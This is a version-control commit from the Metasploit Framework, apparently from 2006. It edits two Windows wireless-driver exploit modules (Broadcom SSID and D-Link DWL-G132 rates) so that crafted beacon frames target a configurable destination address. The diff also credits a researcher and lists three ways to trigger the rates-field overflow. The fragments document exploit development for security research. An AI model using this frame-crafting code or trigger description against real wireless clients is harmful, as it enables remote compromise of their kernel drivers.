Better credit to Gil in the comments, made ADDR_DST do something

git-svn-id: file:///home/svn/framework3/trunk@4141 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-11-15 21:23:03 +00:00
parent 2ce2ff8a3a
commit 5c0176e2dd
2 changed files with 7 additions and 4 deletions

View File

@ -153,7 +153,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
eton(datastore['ADDR_DST']) + # dst
"\x58\x58\x58\x58\x58\x58" + # src
"\x58\x58\x58\x58\x58\x58" + # bssid
"\x70\xed" + # sequence number

View File

@ -137,12 +137,15 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
end
#
# The following research was provided by Gil Dabah of ZERT
#
# The long rates field bug can be triggered three different ways (at least):
# 1) Send a single rates IE with valid rates up front and long data
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
#
def create_beacon
ssid = Rex::Text.rand_text_alphanumeric(6)
@ -158,9 +161,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
eton(datastore['ADDR_DST']) + # dst
src + # src
bssid + # bssid
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval